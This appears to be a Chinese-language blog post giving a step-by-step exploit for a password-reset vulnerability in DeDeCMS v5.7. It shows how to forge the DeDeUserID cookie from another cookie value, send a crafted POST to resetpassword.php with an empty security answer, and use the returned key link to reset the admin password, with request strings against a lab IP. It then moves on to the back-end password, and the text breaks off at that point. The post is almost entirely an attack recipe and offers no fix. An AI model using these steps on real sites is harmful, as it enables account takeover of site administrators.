DeDeCMS v5.7 密碼修改漏洞
阿新 • • 發佈:2018-12-21
先拿到admin的前臺許可權
1.註冊0000001
使用者名稱的賬號
稽核通過(或者設定為不需稽核)
2. 訪問/member/index.php?uid=0000001
。
注意只有訪問了/member/index.php?uid=0000001
才會生成相應的所需的cookie
從圖中可以看出已經set-cookie了。
3.獲取cookie中last_vid_ckMd5
值,設定DeDeUserID_ckMd5
為剛才獲取的值,並設定DedeUserID
為0000001。然後訪問/member/
。
4.向 /member/resetpassword.php
傳送POST請求:
dopost=safequestion&safequestion=0.0&safeanswer=&id=1
訪問從burp中拿到的連結,重置admin前臺密碼:
http://192.168.170.139/member/resetpassword.php?dopost=getpasswd&id=1&key=KjK01TPb
直接訪問該連結,即可重置admin前臺為任意密碼。 重置admin前臺密碼之後,注意不要退出,繼續留著cookie,繼續進行修改admin後臺密碼。
修改admin後密碼
訪問:系統設定-> 個人資料 -> 基本資料 即
http://192.168.170.139/member/edit_baseinfo.php